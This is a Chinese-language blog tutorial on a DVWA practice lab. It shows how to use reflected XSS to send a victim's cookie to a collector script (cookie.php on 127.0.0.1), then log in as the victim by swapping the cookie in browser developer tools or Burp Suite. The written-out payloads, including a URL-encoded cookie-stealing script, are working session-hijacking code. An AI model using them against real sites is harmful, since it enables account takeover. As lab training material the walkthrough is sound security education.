dvwa下利用xss获取cookie并利用(绕过验证)

一、准备

首先呢,需要先有一个dvwa的靶场,我这里是在本地搭建了一个,先访问127.0.0.1,正常用户名密码登录

这里就以low级别进行操作

 二、获取cookie

 选择反射型xss题目,先使用弹窗测试一下<script>alert(123)</script>

 确定可以使用代码之后,在搭建的服务器目录下创建一个cookie.php,我这里是C:wampwww(仅供参考)

 

 目的是为了将获取到的cookie,保存到cookie.php所在目录下自动生成一个cookie.txt

接下来需要根据题目构造js语句

<script>document.location='http://127.0.0.1/cookie.php?cookie='+document.cookie;</script>  #语句是跳转执行访问指定的文件, 并在url中显示cookie

使用js语句获取cookie的两种方式:

第一种方式:url栏输入,进行url编码

原始URL:
http://location/dvwa/vulnerabilities/xss_r/?name=
<script>doument.location='http://127.0.0.1/cookie.php?cookie='+document.cookie;</script>
需要进行URL编码:
http://localhost/dvwa/vulnerabilities/xss_r/?name=
%3Cscript%3Edocument.location%3D%27http%3A%2f%2f127.0.0.1%2fcookie.php%3Fcookie%3D%27%2bdocument.cookie%3B%3C%2fscript%3E#

第二种方式是在xss注入处直接些参数

<script>document.location='http://127.0.0.1/cookie.php?cookie='+document.cookie;</script>

提交,成功的话会跳转到另一个界面

现在我先查看一下文件目录,可以看到是已经成功创建了一个名为cookie.txt的文本

 另外能够看到浏览器url框内有一个cookie的值

 三、攻击者利用获取到的cookie登录到受害者的账户

第一种方式:修改浏览器记录的cookie

获取到cookie后打开另外一个浏览器访问dvwa(此浏览器用别的账号登陆过DVWA,所以浏览器有对应的cookie格式)(因为本地搭建原因,除非重新打开浏览器,否则cookie不能正常刷新,所以直接打开另一个浏览器方便一些),f12打开开发者工具,找到cookie值。

 修改cookie为获取的cookie 并将security 设为low ,然后输入目标用户的ID和密码登陆目标用户,

 

第二种方式:使用burpsuite 抓包,改包, 

 

 ok,已经成功利用获取到的cookie进行登录

原文地址:https://www.cnblogs.com/forforever/p/12685183.html